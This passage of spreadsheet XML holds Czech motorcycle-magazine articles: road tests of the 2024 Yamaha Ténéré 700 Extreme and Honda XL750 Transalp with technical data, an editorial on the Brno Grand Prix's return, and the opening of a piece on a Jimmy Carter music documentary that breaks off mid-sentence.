    <t>Naprosto pohodová extrémní motorka Rubrika: TEST 2024 YAMAHA TÉNÉRÉ 700 EXTREME Takových testů moc nenajdete. Radek (autor textu) byl v minulosti majitelem dvou modelů Ténéré 700 a díky své motoškole (gasovamotoskola.cz) má k téhle motorce i nespočet zpětné vazby. I proto od nás dostal možnost konfrontovat novinku s označením Extreme. Úspěch modelu Ténéré přinesl za poslední roky Yamaze nebývale silný příval čerstvých zákazníků dychtících po jednoduchém, robustním a spolehlivém cestovním enduru. Za dostupnou cenovku toho poskytovala skutečně hodně, i když asi jako žádný stroj na světě nebyla úplně dokonalá. Proto k původnímu modelu v továrně se třemi ladičkami ve znaku vytvořili sourozence, který původní kritiku vyvracel, tedy připomínky k poměrně low cost pérování a k dojezdu základního modelu na 16litrovou nádrž (i když reálně na ní lze urazit přes 300 km). Tehdy nově uvedená verze World Raidu skutečně disponovala jemněji pracujícím pérováním se zdvihy delšími o 20 mm (230 mm předek, 220 mm zadek) a také dvojicí propojených nádrží o celkové kapacitě 23 litrů namísto původních 16 litrů. Snad i proto byl World Raid veřejností přijat velice pozitivně a nejeden majitel původní Ténéré vyměnil základní model právě za tento, přičemž jedním z nich byla i má maličkost. Jenže co čert nechtěl, i tak se našli jedinci, kteří nechtěli přijít o subtilnost původního základního modelu, nicméně nutně potřebovali verzi s vyspělejším, delším odpružením. Jejich nářek byl slyšet až v zemi vycházejícího slunce, kde se rozhodli nářky a modlitby vyslyšet, a tak byl uveden model Ténéré Extreme, na který se právě díváte. Ve zkratce by se dalo říct, že právě Extreme kombinuje štíhlou stavbu základního modelu s pokročilým podvozkem World Raidu, tedy že se bude jednat o ideální nářadí pro toulání se v terénu nejenom mírném, ale i v tom extrémnějším. Pochopitelně s přihlédnutím ke kategorii cestovních endur. Tuto větu sice poněkud popírá Pol Tarrés, který s Tenerkou obráží závody extrémního endura, jako je například Red Bull Romaniacs, avšak nalijme si čistého vína , jen málokdo z nás bude mít s Ténéré Extreme podobný záměr. Bylo mi každopádně velikou ctí, že si v redakci vzpomněli s testováním právě na mě, za což s největší pravděpodobností mohla skutečnost, že jsem vlastnil &amp;gt;&amp;gt; původní verzi Rally, kterou jsem následně osadil podvozkem Öhlins, a přesto ji na konec vyměnil za variantu World Raid, kterou vlastním dodnes. Otázka tedy zní, bude Extreme ještě lepší a zahoří mé srdíčko tak, že za ni vyměním Raida? To se dozvíte na konci „pořadu“. Prvotní jarní testovací termín nám bohužel nevyšel, a proto dostávám Extremku do rukou až na sklonku prázdnin, tedy již po opadnutí prvního wau efektu odborné veřejnosti. S odstupem času si však říkám, že je to vlastně i dobře, neb se na mašinu budu moct podívat realistickým pohledem, který nebude filtrován přes růžové brýle nadrženého koupěchtivého potencionálního zákazníka. Na vlastní kůži Je parný srpnový den, jakých jsme si užili bezpočet, a přede mnou se otevírají dveře na Vrbovce , kam jsem si pro Extremku přijel. Její statná štíhlá postava vyčnívá ve zdejším showroomu nad ostatními modely jako královna lákající k neřestem hned po jejím osedlání. Sedlo ve výšce 910 mm mám sice až u brady (měřím 173 cm), na druhou stranu ani z ostrých endur na zem nedosáhnu, a proto mi tato vlastnost nekalí chuť Tenerku vyvětrat. Její pohotovostní hmotnost zdatně kompenzuje její výšku, takže ji snadno dostávám na denní světlo, kde šplhám do jejího sedla a oživuji dobře známý dvouválec CP-2. Vše při starém Zběžná kontrola nevýhod, které mi vadily a stále vadí na mých Tenerkách, proběhla jen bleskem a zjišťuji, že trn bočního stojanu i nadále bodá do boty, když jezdec stojí ve stupačkách, tyčky zrcátek mají i nadále zcela odlišný sklon, máte-li spojkovou i brzdovou páčku nastavenou do stejného úhlu (závity, do kterých se montují zrcátka, jsou totiž na každém z řídítek v jiných úhlech), zas a znova je pohyb digitálně znázorněné analogové ručičky trhavý, jako by se jednalo o Tamagotchi (digi hru z let 90.), a ano, i nadále zůstává mezi přidaným a ubraným plynem přece jen cukavější nástupová reakce, než jakou znám ze svých dalších motorek. Inu, zde se na inovace bohužel nehledělo, ale už jsem se s těmito drobnými pihami na kráse Tenerek naučil žít, a tak v dobrém rozmaru vyrážím vstříc dobrodružství. Džunglí To první představuje propletení se džunglí stojících aut na Jižní spojce, což je disciplína, kterou Yamaha díky štíhlé siluetě společně s relativně úzkými řídítky (alespoň v kategorii cendur) zvládá na výbornou. Pružnost motoru CP-2 mě zas a znova příjemně překvapuje a v rychlostech 70–140 km/h disponuje motor pružností, jakou by jí mohla závidět nejedna litrová mašina s výrazně vyšším výkonem (a to zcela bez nadsázky). Řazení krátce poskládané šestistupňové převodovky podporuje velmi slušný projev dvouválce, kterému bych tipoval rozhodně více než deklarovaných 73,4 koně. Kde je to s výkonovým potenciálem i zpřevodováním do síly už pochopitelně o něco horší, jsou přesuny vyšší rychlostí, tedy nad 140 km/h, které Tenerka vysloveně nemusí, a jízda například „po německé dálnici“, kde jsem zkusil maximálku (190 km/h), je vysloveně trápení stroje i techniky. Tedy ne že by to Yamaha nezvládala dlouhodobě, avšak v těchto rychlostech můžete na jinak běžně dosahovanou spotřebu 4,7 l/100 km zapomenout a rovnou ji můžete vynásobit dvěma. To už ale sjíždím z německé dálnice a hle, co to nevidím, motokrosová trať a u ní čekající náš fotograf. Ano, vím. Ténéré Extreme má v názvu cosi extrémního, což opravdu neznamená, že by se měla na denní bázi prohánět na MX tratích. Avšak lavice na trati v Benátkách máme již delší dobu v redakci vedeny jako takový etalon, jak si která z mašin stojí a která zdejší rozbitý povrch a dopady skoků ustojí a která ne. První kolo Během prvního kola se oba jen tak oťukáváme, ovšem i přesto musím konstatovat, že štíhlá silueta společně s jinak rozloženou hmotností než u Raida dělají poměrně hodně, tudíž mysl jezdce není tolik svazována masou stroje. Podvědomě se na Extremce cítí jezdec přece jen o něco obratnější a více si dovolí. Snad proto už při dalším průjezdním kole doskakujeme celou cca 8metrovou lavici až do dopadu, což se pak už děje po celý zbytek dne. V zatáčkách, které jezdec projíždí svižněji, působí hubeňourka opravdu svěže. Nicméně dojde-li na ty pomalejší, v těch už o sobě přece jen dává vědět nádrž umístěná přímo nad motorem, která pocitově zvyšuje těžiště. Nejvíc to pocítíte v okamžicích, kdy mašinu zvedáte z bočního stojanu nebo otáčíte kolem nohy. V tomto pohledu vidím – a mnoho majitelů modelu Extreme mě za to asi ukřižuje – přece jen lehčí/níže položené těžiště u cestovní verze World Raid, disponující naprosto identickým podvozkem a dvojicí nádrží, které jsou umístěné nikoliv nad motorem, ale po jeho stranách. Ano, bude-li Raid plně natankovaný, bude ještě méně hbitý než verze Extreme, nicméně pakliže do něj natankujete jen polovinu, případně 2/3 paliva, tedy cca tolik, kolik se dá maximálně natankovat do štíhlé Extremky, budou mít stejný dojezd. A přitom Raid působí v malých rychlostech co do těžiště přece jen o něco hravěji, což může na první přečtení působit zvláštně, ale je to tak. Ano, jezdec má na štíhlé verzi mnohem větší volnost pohybu, a ano, odvaha pouštět se do drsnějších kousků také jasně hovoří pro variantu Extreme, avšak touláte-li se krajinou a občas musíte spíše kličkovat na pěšinách připomínajících lesní single trialy, pak si dovolím tvrdit, že na Raidu vám bude lépe za předpokladu, že v sobě bude mít srovnatelné množství paliva jako verze Extreme. Kde Raid zase naprosto prohrává, je zlobení. Kupříkladu zvedání a jízda po zadním jednoznačně hovoří ve prospěch Yamahy se zvednutým předním blatníkem a dřímá-li ve vás duše chuligána, pak právě tahle divoška se štíhlou postavou je pro vás ideálním nářadím. Tlustší Raid má sice nádrže po stranách dole, avšak blíže k přednímu kolu, a tak se mu nahoru také chce, ale přece jen méně ochotně než Yamaze se zvednutým předním blatníkem. Výška sedla A jak je to s výškou sedla a modelovou řadu Tenerek? Pro méně narostlé borce (ke kterým patřím) přijíždí na pomoc verze Explorer s nižšími zdvihy a sedlem ve výšce příjemných 860 mm. Standardní Ténéré pak měří v „kohoutku“ 875 mm, Raid následně 890 mm a zde testovaná Extremka, jak už bylo řečeno, extrémních 910 mm. I přes uvedenou míru mi však nepřišlo nemožné tuto nejvyšší z dam regulérně používat. Ano, když s ní zastavím, dosáhnu se svými 173 cm na zem pouze &amp;gt;&amp;gt; špičkami, ale mně osobně to stačí a v nehorším si hold povysednu na stranu a prodloužím tak nohu. Abych byl zcela upřímný, ani jsem během jízd neřešil výšku sedla a normálně si mašinu užíval a teprve po testování se mě hned několik followerů na Instagramu GasovaMotoskola ptalo, jak jsem s tak vysokým sedlem mohl jezdit… A když jsem se nad tím zamyslel, skutečně mi to vzhledem ke štíhlosti sedla i k nízké pohotovostní hmotnosti nepřipadalo nijak problematické. Modlitba Co bych si od Yamahy přál do budoucna? Velice rád bych vyměnil rádoby moderní barevný displej za původní monochromatický. Přišel mi lépe čitelný, a hlavně disponoval tlačítkem na přímé vypnutí ABS. (Kontrolu trakce ani antiwheelie naštěstí Tenerky neznají.) Moderní ovládání kolečkem, jež je navíc na pravé ruce, kterou permanentně držíte plyn, mi jednoduše nepřijde jako šťastné řešení. Osobně ani nepotřebuji aplikaci Yamaha , která mi řekne, kudy jsem jel nebo jak moc jsem klopil (mimochodem, tyto údaje nepovažuji za zcela přesné), nepotřebuji ani tři různé designové styly vzhledu palubní desky. Snad jediné, co jezdci toužící po návštěvě soutěží ocení, bude sériově dodávaný tripmaster, jehož ovládání je vyvedeno k levému gripu. Prostě méně je někdy více a osobně bych se z hlediska jednoduchosti infotainmentu raději vrátil o generaci Tenerek zpět. Resumé Jaké je ovšem resumé? Bude se u mě v garáži měnit Raid za Extremku, podobně jak tomu bylo v případě výměny Rally modelu za Raida? Abych řekl pravdu, tentokrát ne. Pořizovací cena všech modelů je sice nyní na úžasně atraktivní úrovni, a pokud to s jízdou v terénu myslíte vážně, pak má Extreme verze jednoznačně smysl. Nicméně i kdybych neměl v oblibě cestování na dálky, jako že mám, i tak bych asi znovu volil verzi World Raid. Disponuje nižším těžištěm (pokud nemá na hrbu natankováno všech 23 litrů paliva), nižším sedlem a identickým podvozkem, jaký má tato Extreme. Na druhou stranu, pokud je vaší doménou řádění na zadním, zlobení, kde se dá, skákání skoků a potřebujete štíhlou siluetu, pak naprosto rozumím, proč právě model Extreme je pro vás ten jediný správný. Tak jako tak, s ohledem na pořizovací ceny, robustnost, spolehlivost a jízdní schopnosti považuji celou řadu Ténéré za to nejlepší, co se dá v poměru cena/užitek na trhu pořídit, a myslím si to už pět let. // Štíhlá stavba umožňuje zcela volný pohyb jezdce během jízdy ve stupačkách Grafika, plynulost (kousavý chod ručičky) displeje ani ovládání menu kolečkem nás nenadchly Na zlobení se hodí z celé řady Ténéré nejvíce právě varianta Extreme Užší řídítka vám dají volnost v dopravní zácpě, a přitom ještě neubírají na jistotě vedení stroje Co je extreme? Stejný motor CP-2, jaký mají ostatní verze Nastavitelná vidlice KYB, ø 43 mm Plně nastavitelný zadní tlumič piggyback, rovněž KYB Plus 20mm zdvihy oproti základu Vyšší umístění sedáku Vysoký přední blatník Nádrž o objemu 16 litrů Seriál testů aktuálních modelů z řady Ténéré 700 bude v Motohouse ještě pokračovat. V některém z dalších vydání si od Radka budete moct přečíst i recenzi další letošní novinky, umírněnější verze Explore. Štíhlá, vysoká s nadprůměrnou světlou výškou. Taková je Extreme. Vysoký je blatník jen z půlky. Jeho zadní část chytře kryje motor. Šedý ovladač slouží k ovládání tripmasteru O designovém provedení povinných odrazek by se dalo polemizovat Sklopitelná řadička je u cendur povinnost, sklopitelná i brzda je rozhodně bonus! Již v základu můžete počítat s robustními stupačkami, podporujícími jízdu vestoje Místo klasické 12V zásuvky zde najdete USB konektor Máte-li páčky ve stejném úhlu, budou vaše zrcátka křivě, tedy pod různými úhly Podvozek – jedna z věcí, pro které ji budete milovat Technická data – 2024 Yamaha Ténéré 700 Extreme Motor Typ: řadový dvouválec, kapalinou chlazený, DOHC 8V | Objem: 689 cm3 | Vrtání × zdvih: 80 × 68,6 mm | Výkon: 73,4 koně @ 9000 ot./min. | Točivý moment: 68 Nm @ 6500 ot./min. | Spojka: mokrá, vícelamelová | Převodovka: 6rychlostní | Sekundární převod: řetěz Podvozek Rám: ocelový páteřový | Odpružení přední: USD ø 43 mm, nastavitelné | Odpružení zadní: centrální tlumič, nastavitelný | Zdvihy: 230/220 mm | Brzdy přední: 2× 282mm disk, 2pístek | Brzdy zadní: 245mm disk, 1pístek | Pneumatika přední: 90/90-21 | Pneumatika zadní: 150/70-18 Rozměry Rozvor: 1595 mm | Nádrž: 16 l | Výška sedla: 910 mm | Váha: 205 kg (s náplněmi) Cena 294 990 Kč Autor: text: Radek „Gas“ Michna, foto: Honza Karásek Rubrika transition_slide TEST 2024 YAMAHA TÉNÉRÉ 700 EXTREME</t>
  </si>
  <si>
    <t>20241001_26_2997592349_19ef7d73acbb667c9ba6.html</t>
  </si>
  <si>
    <t>19ef7d73acbb667c9ba6</t>
  </si>
  <si>
    <t>GENIUS VŠEOBECNOSTI</t>
  </si>
  <si>
    <t>GENIUS VŠEOBECNOSTI Rubrika: TEST 2024 HONDA XL750 TRANSALP Pamatuju si přesně ten úžas, když jsem se na ní vloni poprvé projel – dokonalá motorka! Zajímalo mě tedy, co z té dokonalosti zbylo po roce a jaký to je, když se na Transalpa navěsí všechno, co se na něj od výrobce navěsit dá. Po desetileté pauze přišla Honda vloni s něčím, na co fanoušci značky netrpělivě čekali, poněvadž pro někoho je Africa Twin moc, pro jiného zas CB500X málo. A já osobně se vůbec nedivím ani jedné ze stran uživatelského spektra. Taky nemám rád, když je to na mě moc, protože to většinou bývá zbytečný stres. Zároveň ale postrádám smysl samotnýho ježdění, když je to na mě málo. Naštěstí tu teď máme znovuzrozený Transalp, který by se s trochou fantazie klidně mohl jmenovat třeba Zlatá střední cesta. Jenže… Honda v pravém slova smyslu Honda vždycky ví, co dělá. Možná to není pro každého, ale mohlo by být. A nakonec člověku nezbude než to uznat. A tak je i tenhle Transalp do detailu promyšlený, přesně zacílený stroj s ideálním poměrem cena/výkon, jaký budou milovat masy motorkářů, pro které je určený – ne přehnaně bohatí, ne přehnaně jezdecky zdatní, ne přehnaně excentričtí. Motor, který známe z Horneta, je podobně jako obě motorky, který pohání, prostě to nejlepší, co se dá ve střední kategorii za rozumný peníze mít. Výkon 92 koní a krouťák 75 Nm je přesně ta míra, která dá člověku pocit, že má pod zadkem rychlou motorku, aniž by se jí musel bát. Ve středním pásmu otáček umí pořádně zahoupat žaludkem a nahoře pak už je to na průměrnýho čendu, jímž jsem, pořádná raketa. Zároveň když chci jet kochačku někde hluboko pod 5000 otáček, nemá s tím nejmenší problém, ačkoliv u dvouválce bych tedy čekal trochu hutnější spodek. Celkově je ten motor v každém ohledu široce přijatelný ideál. Řeklo by se až neškodná zábava v mezích zákona. Čili nepochybně kasovní trhák. Pokud vás zajímá detailní test… … navíc z pera jedince, který dokáže každou motorku dohnat až na hranu jejích schopností, aby odhalil i sebemenší její slabinu, pak vaší laskavé pozornosti doporučuju test kolegy Gase, otištěný v letošním lednovém dvojčísle Motohousu. Ten vloni po několik měsíců týral Transalpa až k slzám a říkám vám rovnou, že na něm nenašel slabé místo. Já mám ale pocit… … že ani tak detailní rozbor technické stránky Transalpa a jeho schopností nedá čtenáři to podstatné – totiž jak se na motorce bude cítit. Sám totiž po společném týdenním potýkání Transalpa podezřívám, že na pocity je to překvapivě(?) chudá motorka. Tedy alespoň ve mně jich vyvolal pramálo. Pokusím se vysvětlit proč. Nejprve ale musím vyjádřit lítost nad tím, že ve zmíněném týdnu nám to spolu nevyšlo ani na kratší dovolenou. Protože tohle je skutečně bezstarostná jízda – motorka právě na týden, v němž jediný tvůj problém jseš ty sám, nebo maximálně tak absence ještě jednoho páru náhradních ponožek či nanejvýš možná přesolený oběd v restauraci. Týden, který strávíš na motorce, jež se tak blíží dokonalosti, že o ní skoro ani nevíš. A tak se ptám: Je tohle opravdu to, co chceš? Podle mýho názoru to totiž může být krapet problém ve chvíli, kdy takovou motorku máš ne na týden, ale třeba na pět let. Já si totiž myslím, že si motorky kupujeme právě proto, abychom o nich moc dobře věděli. Abychom do nich byli zamilovaní. Abychom kvůli nim nespali touhou. Aby v nás probouzely vášeň a emoce, a tedy i city vůči nim samotným. A to jednak tím, jak vypadají, jednak tím, že nám v každém okamžiku dávají najevo, že sakra záleží na jezdci, jak se ona v zatáčce bude chovat a jak ji projede. Zkrátka aby pro nás byly výzvou a ponoukaly nás k co nejumnějšímu zacházení s nimi. Což Transalp jako špičkový, uživatelsky neobyčejně vstřícný a po všech stránkách dotažený produkt své doby tak trochu nedělá, jelikož on naopak udělá za mě všechno sám. Čili vykreje cokoliv, co by mohlo byť jen stínem ohrozit mou komfortní zónu jakož i jeho spokojenost vůbec. Transalp je zkrátka jako ta totálně samostatná holka, která nikdy neprojeví slabost, ba ani vrtoch. Vždycky perfektně vypadající, vždycky s náladou mírně nad nulou (nikdy ne ale příliš), vždycky akurátní v každý situaci, bez známek slabosti. Holka, pro kterou se nemusíš snažit být jí každý den co možná nejlepším partnerem. Holka, která tě staví do role, že jaksi prostě jen jsi, a jestli s ní, nebo bez ní, to je jí tak trochu jedno. S tímhle mívá mnoho mužů ocitnuvších se ve vztahu s takovým typem ženy dost problém. Mají pak totiž pocit, že jsou vlastně zbyteční. Proč sem pletu nějaký holky, ptáte se? No proto, že když to trochu přeženu, Transalp je tak blízek dokonalosti, že skoro jeví tendence stát se nejpozději ve své příští generaci motorkou, která se bez jezdce úplně obejde. Tenhle pocit ve mně ta motorka vyvolává tím, jak perfektní sama v každé situaci je. Čímž mě, skoro bych řekl, degraduje z jezdce na pouhého uživatele. Ne že by mě to snad uráželo. Jen mě to prostě nebaví. Kde je v té dokonalosti smysl motorkaření? Podle mého soudu bohužel nikde. Jak jsou motorky čím dál dokonalejší, jako by se z celé záležitosti pomalu ale jistě stávala vyprázdněná činnost, cosi jako jen další zaplácnutí volného času nějakou bezduchou aktivitou, jako je například sledování televize. Prostě „jen aby se něco dělo“. Až takhle může celá romantika motorkaření pro někoho degradovat, když se stroje blíží dokonalosti. Sci-fi odbočka Hádám, že když to takhle půjde s vývojem dál – a ono stoprocentně půjde! – pak není daleko doba, kdy začnou výrobci vedle všech možných výbavových paketů dodávat ještě jeden, který bude nejspíš dražší než motorka sama – totiž paket emoční. Bude spočívat v tom, že vám někde vzadu v garáži a pod rouškou tmy (poněvadž bohužel už protizákonně) z motorky sundají veškerý elektronický asistenty, abyste mohli zažít tu opravdovost. V lepším případě. V horším vás posaděj do křesla a drátama napojej na AI. Pro koho teda je? Smyslem testování motocyklu je ale nalézt jeho kupce a pro něj pak o tom motocyklu psát. Našel jsem ho? Nepřekvapivě ne i překvapivě ano. Pokud bych měl Transalpa někomu doporučit, pak nejspíš jedincům, kteří mají pocit, že by se na svých cestách chtěli do budoucna zaměřit trochu víc na šotolinu, poněvadž asfalt je začíná přece jen už maličko nudit, ale dosud se mimo něj ocitli spíš jen výjimečně a neradi. Takovým jedincům může být Transalp opravdu &amp;gt;&amp;gt; vítaným společníkem, jakkoliv jejich dojmy z „pořád stejné“ jízdy po asfaltu ještě podpoří. V terénu to ale může být jinačí písnička. Tedy ne že by to byl bůhvíjaký hard offroad, ale jeho v každém ohledu uživatelsky vstřícné vlastnosti můžou být takovýmto opatrným začátečníkům v disciplíně „polňačka a možná jednou i trochu víc“ hodně nápomocný. Z pěti palivových map (Standard, Sport, Rain , Gravel, User) jsou tu pro ně vhodný dvě, jednak přirozeně samotná Gravel, jednak – a hlavně! – User, ve které si lze nastavit vše individuálně podle zdatnosti a rozpoložení uživatele – motorovou brzdou počínaje přes odezvu na plyn až po kontrolu trakce a ABS. Neobyčejně přátelská povaha Transalpa v kombinaci s takovým individuálním nastavením může být opravdu výtečný mix při prvních nesmělých kilometrech mimo asfalt. Jednotlivé parametry pak lze samozřejmě postupně měnit v závislosti na tom, jak se sám jezdec v čase zdokonaluje. Důležitým pomocníkem při tom jistě budou i velmi dobře dávkovatelné brzdy, o nichž opět lze říci to samé, co o celé motorce. Navíc odpružení Showa (jakkoliv bez možnosti individuálního nastavení) a výška zdvihů (200 mm vředu, 190 mm vzadu) jsou na takové to domácí ježdění za stodolou úplně super. Rázem je skutečnost, že na Hondě Transalp nenajde nic extrémního (ať už míněno kladně, či záporně), velkou výhodou! Akorát jedinec, který má peníze jen na Transalpa v základním vybavení, a přesto se s ním chce podívat i za postranní čáru vozovky, by měl přece jen něco málo navíc utratit za padáky a kryt motoru. Všechno ostatní, co ke svýmu nesmělýmu blátivýmu štěstí potřebuje, tady najde už v základu – tedy solidní pneumatiky a zubatý stupačky. Pokud jde ale o asfaltové povrchy… … pak jsem kupce Transalpa nejspíš nenašel. Myslím totiž, že takoví lidé se kolem mě ani nevyskytují, jakkoliv na planetě Zemi nepochybně jsou a je jich opravdu hodně. Já ale dost pochybuju, že i kdybychom na sebe narazili, měli bychom si co říci. Z toho, jak na mě Transalp působí, u nich předpokládám úplně jiný náhled na svět, a tudíž i úplně jinou životní trajektorii. Zkrátka se míjíme. A zhruba někde v těchto místech psaní mi zazvonil telefon a v něm kamarád, ať s ním jdu na pivo . Takový výzvě já samozřejmě neumím odolat, takže jsem se od psaní zvedl s tím, že to dokončím jindy. A jindy je teď… … a vy prostě nebudete věřit, co se mi na tom pivu stalo. Mezi druhým a třetím pivem kamarád najednou pravil: „Tak tys měl Transalpa?! Pročs mi to neřek? Já se na něm strašně chci svézt. Uvažuju, že bych ho koupil.“ Bác! A je to. Tohle mi řekne jedinec, se kterým jsem prožvanil nejeden večer, ba dokonce v jeho společnosti ujel několik tisícovek kilometrů na motorkách. Nota bene je to člověk, kterej má dvě Hondy – jednu pečlivě udržovanou klasiku ze sedmdesátek a jednu absurdní stavbu z CX500, čili absolutně nic, co by se dneska řídilo nějak samo a nevyžadovalo jezdcovo plné soustředění a vyšší míru řidičských schopností. „Proč? Vždyť je to sterilní. Je přece tolik zajímavějších motorek…“ vypálil jsem v odpovědi to první, co mě napadlo. „Protože chci cestovat s partnerkou a Honda je pro mě samozřejmě jediná možnost. No a CB500X je na mě fakt málo a Africa Twin zase zbytečně moc.“ A takhle to máte se vším. V životě je jen jediná jistota, totiž že očekávání a předpoklady nemají s realitou nic společnýho. A někdo má holt samu značku motorky jako fetiš a pak vlastně není co řešit. Takže na závěr vám doporučuju toto: Kupte si Transalpa. Nezaručím vám, že vás bude bavit, ale tutově budete mít v rámci technických možností roku 2024 dokonalou motorku. (A hlavně nezapomeňte, že kouzlo motorek spočívá mimo jiné v tom, že z jednoho motocyklu můžou mít dva lidi naprosto odlišný pocity.) Jako ta totálně samostatná holka, která nikdy neprojeví slabost, ba ani vrtoch... Tvoje první opatrná louže? Tak to jseš tady správně! Tohle je barevný odkaz k první generaci, ale zkuste ji v barvě Matte Iridium Gray. Budete se divit, jak moc dobře v ní vypadá! Pakety možného příslušenství Urban 50litrový vrchní kufr, hliníkový panel, montážní plotna, opěrka pro spolujezdce a vnitřní taška, vyšší plexi štít a centrální stojan Touring Zadní boční kufry (pravý 26 l / levý 33 l), hliníkové panely, upevňovací rám, vnitřní tašky a vyhřívané rukojeti Adventure Boční ochranný rám, LED mlhové světlomety a mřížka chladiče Rally Rychlořazení, kryt motoru, spodní ochranná deska, off-road rallye stupačky a kryty rukojetí s nástavci Comfort 3litrový tank bag, deflektory, komfortní stupačky spolujezdce a AAC nabíjecí zásuvka Z výrazu figuranta je jasný, že s Transalpem v týhle výbavě vás nerozhodí ani to, když jednou přijdete domů a najdete kufry přede dveřma. Ten batoh, který je po rozbalení třikrát větší než na fotce, je součástí jednoho z paketů. Někdo holt rád promyšlený až do nejmenší taštičky. Proč ne. Je tady krapet přecpáno a spoustu z toho na tu dálku beztak nepřečtu Pohodlíčko, jistota, veškerej komfort. Tohle žádná neodmítne. Přehledný a jasný. S klasickou hondí schválností klaksonu na místě směrovek. Nevypadají na to, ale ubrzděj i hodně rozjetej mejdan Připraveno pro terén tak těžkej jako sám život Technická data – 2024 Honda Xl750 Transalp Motor Typ: vodou chlazený řadový dvouválec, OHC, 8V | Objem: 755 cm3 | Vrtání × zdvih: 87 × 63,5 mm | Maximální výkon: 92 koní @ 9500 ot./min. | Točivý moment: 75 Nm @ 7250 ot./min. | Počet rychlostí: 6 | Sekundární převod: řetěz Podvozek Rám: ocelový, kosočtvercové profily | Přední odpružení: ø 43 mm, Showa SFF-CA, zdvih 200 mm | Zadní odpružení: monoshock, Pro-Link, zdvih 190 mm | Přední brzda: 2× 310mm disk, axiální 2pístek | Zadní brzda: 256mm disk, 1pístek | Pneu přední: 90/90-21 | Pneu zadní: 150/70-R18 Rozměry Rozvor: 1560 mm | Výška sedla: 850 mm | Světlá výška: 210 mm | Objem nádrže: 16,9 l | Hmotnost s náplněmi: 208 kg Cena 249 900 Kč Autor: text: Jirka Jaroš, foto: Filip Svačina Autor person Jirka Jaroš Rubrika transition_slide TEST 2024 HONDA XL750 TRANSALP</t>
  </si>
  <si>
    <t>20241001_27_2997534282_f9a82a0af557ebb34cc4.html</t>
  </si>
  <si>
    <t>f9a82a0af557ebb34cc4</t>
  </si>
  <si>
    <t>Do Brna</t>
  </si>
  <si>
    <t>Do Brna Podle všeho se do Brna vrací motocyklová Grand Prix . V krátkosti shrnu tři důvody, proč si myslím, že je důležité tento závod u nás znovu obnovit a pořádat. Zaprvé, motocyklové závody v Brně jsou podle mě již neodmyslitelnou součástí našeho národního kulturního dědictví. Od šedesátých let tento podnik spoluutvářel svět několika generací fanoušků a v mnohých aspektech ovlivňoval naše životy. Díky němu také byly motorky (a stále jsou) v naší zemi něčím výjimečným, díky němu se nám otevíraly obzory, Grand Prix nám totiž tehdy umožnila zviditelnit se i ve světě za uzavřenými ploty, a i za to bychom jí měli být dodnes moc vděční. Zadruhé, často se zmiňuje otázka státních dotací na Velkou cenu. A já se ptám: Proč? Vždyť stát dotuje i mnohé další významné akce, sportovní turnaje, filmové festivaly, koncerty, divadla, výstavy… Dneska je prakticky každá větší akce nějakým způsobem závislá na dotacích. Proč tedy všichni pořád řeší jen peníze na brněnské motorky? Je to zvláštní. Přitom na druhé straně vah jsou jasné argumenty. Velká cena je bezkonkurenčně největší akcí na našem území, přitahuje desítky tisíc lidí, včetně početního zástupu zahraničních. A ti všichni u nás utratí peníze – od vstupenek přes ubytování, naftu, dálniční poplatky až po to pivo a párek na divácké stráni. To všechno na sobě nese DPH. A to putuje kam? No přece do státní kasy. Tak proč okolo toho pořád ty dohady… A zatřetí, jde o budoucnost českého silničního sportu jako takového. Máme teď silnou generaci dorostu například v rostoucí MiniGP, ale musíme pro ně mít i ten cíl, tu metu, kam se budou chtít ve svých kariérách posunout. A k tomu budeme potřebovat také novou generaci sponzorů a lidí, kteří budou ochotni přispět nějakou pomocí. Ty ale nevygenerujete jinak, než že je přivedete na světové závody, kde jim dovolíte nasát atmosféru a zapustit kořeny. Stejně jako se to podařilo kupříkladu u firem ORT nebo WEPOL v Hořicích . Tohle všechno je sice běh na dlouhou trať, ale je to tak – bez domácí GP nebudeme mít domácí scénu, ani další generaci závodníků, a ani úspěch na světových tratích. Z tohoto pohledu se Grand Prix vrací do Brna v podstatě za pět minut dvanáct a je skvělé, že se to podařilo. Teď už si jen držme palce, aby se nic nepokazilo a ta symbióza byla životaschopná a funkční. A tím vás vítám u čtení našeho říjnového vydání. Jsem rád, že jste s námi znovu, a těším se, že si společně užijeme to nejkrásnější – motorky. Díky vám všem za vaše nadšení. Autor: Honza Karásek Autor person Honza Karásek</t>
  </si>
  <si>
    <t>20241001_28_2997416313_c83cf3427a39d8df4cd1.html</t>
  </si>
  <si>
    <t>c83cf3427a39d8df4cd1</t>
  </si>
  <si>
    <t>Jimmy Carter - Rock N Roll President</t>
  </si>
  <si>
    <t>Jimmy Carter - Rock N Roll President Nebýt lahve skotské a noční návštěvy hudebníka Gregga Allmana , Jimmy Carter by možná nikdy nebyl zvolen 39. prezidentem Spojených států . Dokument mapuje většinou zapomenutý příběh o tom, jak Carter, milovník všech druhů hudby, navázal úzké pouto s hudebníky Williem Nelsonem , Allman Brothers, Bobem Dylanem a dalšími. Carter, který neměl dostatek finančních prostředků na kampaň, spoléhal na podporu těchto umělců, kteří mu v demokratických primárkách poskytli rozhodující podporu. Po Carterově zvolení se hudebníci stali častými hosty v Bílém domě . Hudba hrála během Carterova života a v jeho práci důležitou roli. Proto se stala i nedílným tématem poutavého portrétu nejdéle žijícího prezidenta v americké historii. Nikdy jsem v Ameriku nevěřil tolik jako dnes. Amerika , jak praví Bob Dylan , se zabývá svým zrozením, nikoli umíráním. To zní povědomě. Ještě než jsem se stal guvernérem, znal jsem všechny desky Boba Dylana . Mám taky všechno od Willieho Nelsona . A Allman Brothers mi pomohli sehnat peníze na kampaň. Česká televize uvádí americký dokument JIMMY CARTER : ROCK &amp;amp; ROLL PREZIDENT S Gregem jsme přátelé. Přijeli Allman Brothers . Bob Dylan sice ne, zato Willie Nelson a Johnny Cash ano. Potěšilo mě, že přivedl i June . Tvrdili jsme, že je to má sestřenice. Willie Nelson se v životopise přiznal, že když u mě přespával, hulil v Bílém domě trávu. Píše, že jeho společník, který se s ním o trávu podělil, byl jeden z členů personálu. Není to tak docela pravda. Byl to ve skutečnosti jeden z mých synů. Willie nechtěl, aby to na něj prasklo. Některým lidem se nezamlouvalo, že jsem se angažoval ve prospěch Willieho Nelsona , Boba Dylana a jiných "pochybných" rockerů. Mně to bylo fuk, protože jsem dělal to, čemu jsem věřil. Odezva příznivců těchto muzikantů měla mnohem větší význam než reakce hrstky lidí, podle nichž bylo nevhodné, aby se prezident družil s údajnými radikály. Jednou z věcí, které Američany spojovaly, bylo nadšení pro muziku a poslouchání hudby, kterou zbožňujeme. Lidi podle mě spojuje záliba pro určitý rytmus, ať už jde o příznivce country, rocku, jazzu nebo klasické hudby. Jako kluk jsem chodil na gospelová vystoupení místních 